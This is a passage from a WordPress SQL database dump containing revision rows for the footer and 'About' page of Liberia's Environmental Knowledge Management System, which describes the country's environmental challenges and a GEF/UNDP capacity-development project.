Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n												<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/white_bg_seal.png\" title=\"\" alt=\"\" />														\n		This is an Official Web Platform of the Liberian Government.		\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:49:59','2021-08-16 11:49:59','',3805,'https://ekmsliberia.info/?p=3808',0,'revision','',0),(3809,38,'2021-08-16 11:52:19','2021-08-16 11:52:19','Subscribe To Our Newsletter		\n			<a href=\"#\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n												<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/white_bg_seal.png\" title=\"\" alt=\"\" />														\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:52:19','2021-08-16 11:52:19','',3805,'https://ekmsliberia.info/?p=3809',0,'revision','',0),(3810,38,'2021-08-16 11:53:01','2021-08-16 11:53:01','Subscribe To Our Newsletter		\n			<a href=\"#\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:53:01','2021-08-16 11:53:01','',3805,'https://ekmsliberia.info/?p=3810',0,'revision','',0),(3811,38,'2021-08-16 11:53:19','2021-08-16 11:53:19','Subscribe To Our Newsletter		\n			<a href=\"#\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:53:19','2021-08-16 11:53:19','',3805,'https://ekmsliberia.info/?p=3811',0,'revision','',0),(3812,38,'2021-08-16 11:54:30','2021-08-16 11:54:30','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:54:30','2021-08-16 11:54:30','',3805,'https://ekmsliberia.info/?p=3812',0,'revision','',0),(3823,38,'2021-08-16 15:13:51','2021-08-16 15:13:51','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 15:13:51','2021-08-16 15:13:51','',3805,'https://ekmsliberia.info/?p=3823',0,'revision','',0),(3824,38,'2021-08-16 15:24:17','2021-08-16 15:24:17','https://ekmsliberia.info/wp-content/uploads/2021/08/jet-search-1.zip','jet-search (1).zip','','private','open','closed','','jet-search-1-zip','','','2021-08-16 15:24:17','2021-08-16 15:24:17','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/jet-search-1.zip',0,'attachment','',0);
INSERT INTO `wp_posts` VALUES (3829,38,'2021-08-17 11:04:22','2021-08-17 11:04:22','<h2>About the EKMS</h2>\n<h2>Why was the EKMS created?</h2>\n<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).&nbsp;</p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.&nbsp;</p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.&nbsp;</p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.&nbsp;</p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>\n<h2>What does the EKMS include?</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->\n\n<h2>Acknowledgement</h2>\n<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>\n<h2>Disclaimer</h2>\n<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2021-08-17 11:04:22','2021-08-17 11:04:22','',68,'https://ekmsliberia.info/?p=3829',0,'revision','',0),(3830,38,'2021-08-17 11:04:23','2021-08-17 11:04:23','<h2>About the EKMS</h2>\n<h2>Why was the EKMS created?</h2>\n<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover 